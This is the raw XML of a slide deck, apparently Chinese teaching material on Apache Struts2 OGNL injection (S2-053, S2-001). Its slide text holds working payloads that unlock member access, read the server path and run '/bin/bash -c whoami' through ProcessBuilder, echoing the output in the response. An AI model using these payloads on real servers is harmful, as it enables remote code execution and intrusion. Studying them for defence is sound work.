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03" r:id="rId2"/>
    <p:sldId id="1104" r:id="rId3"/>
    <p:sldId id="1105" r:id="rId4"/>
    <p:sldId id="1106" r:id="rId5"/>
    <p:sldId id="1107" r:id="rId6"/>
    <p:sldId id="1108" r:id="rId7"/>
  </p:sldIdLst>
  <p:sldSz cx="12196763" cy="685800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294A5A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2023/3/1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5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S2-053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31DCC-4F3F-1FD5-82C7-4A909E03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8" y="1382284"/>
            <a:ext cx="9448800" cy="57531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75F684-617A-4F46-2982-F24010EBB33A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="409749" y="767117"/>
            <a:ext cx="9808464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name=%{(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)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C79584-37F7-7883-097A-01FCBA73ECED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10434237" y="7984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S2-053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992E95-2A1B-A708-0A6C-B75F8D00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3" y="1340768"/>
            <a:ext cx="8048625" cy="4524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A8ED70-2BBB-EE69-8BB5-9B341861FFD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="538390" y="781850"/>
            <a:ext cx="9793088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name=%{(%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS)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3283B2-AED9-C8C3-B80A-1B22CDECB252}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10578676" y="7818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1F908-B766-6EED-C4FB-091EB40E5A21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="654775" y="1250388"/>
            <a:ext cx="10297144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       #response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),    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US" altLang="zh-CN" b="0" dirty="0">
              <a:ea typeface="Cambria Math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9BD7F-587F-DEEC-4686-AD38016E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" y="4005064"/>
            <a:ext cx="4495800" cy="1857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C423AA-D000-66D1-E72F-685A811329BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553765" y="73988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获取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路径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（在漏洞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S2-001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的环境下生效）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1F908-B766-6EED-C4FB-091EB40E5A21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="654775" y="1250388"/>
            <a:ext cx="10297144" cy="1754326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       #response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),    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US" altLang="zh-CN" b="0" dirty="0">
              <a:ea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C423AA-D000-66D1-E72F-685A811329BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553765" y="73988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获取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路径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（在漏洞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S2-001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的环境下生效）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3F94F7-78C3-2CFB-4167-3744E7F9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8" y="3501008"/>
            <a:ext cx="394390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1F908-B766-6EED-C4FB-091EB40E5A21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="654775" y="1250388"/>
            <a:ext cx="10297144" cy="2031325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#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(), #response.println(#req.("get".concat("RealPath"))('/’)),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 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C423AA-D000-66D1-E72F-685A811329BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553765" y="73988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获取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路径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（在漏洞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S2-001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的环境下生效）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829CB4-3C77-1337-93E8-BC70F92B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9" y="3784492"/>
            <a:ext cx="4191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1F908-B766-6EED-C4FB-091EB40E5A21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="654775" y="1250388"/>
            <a:ext cx="10297144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%{#a=(new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1">
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>java.lang.ProcessBuilder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0">
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1">
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>java.lang.String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0">
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>[]{"/bin/bash", "-c","</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1">
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0">
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>"})).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1">
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>redirectErrorStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0">
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(true).start(),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#b=#a.getInputStream(),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#c=new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1">
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>java.io.InputStreamReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0">
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(#b),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#d=new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1">
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>java.io.BufferedReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0">
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(#c),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#e=new char[50000],#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1">
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>d.read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0">
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(#e),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#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1">
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>java.lang.String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0">
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(#e)),#f.getWriter().flush(),#f.getWriter().close()}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C423AA-D000-66D1-E72F-685A811329BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553765" y="73988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获取当前登录用户名称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（在漏洞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S2-001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的环境下生效）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8645D1-0159-92B1-902E-4F133A06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5" y="4077072"/>
            <a:ext cx="5122300" cy="19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自定义</PresentationFormat>
  <Paragraphs>39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Cambria Math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2023-03-01T11:00:19Z</dcterms:modified>
</cp:coreProperties>
</file>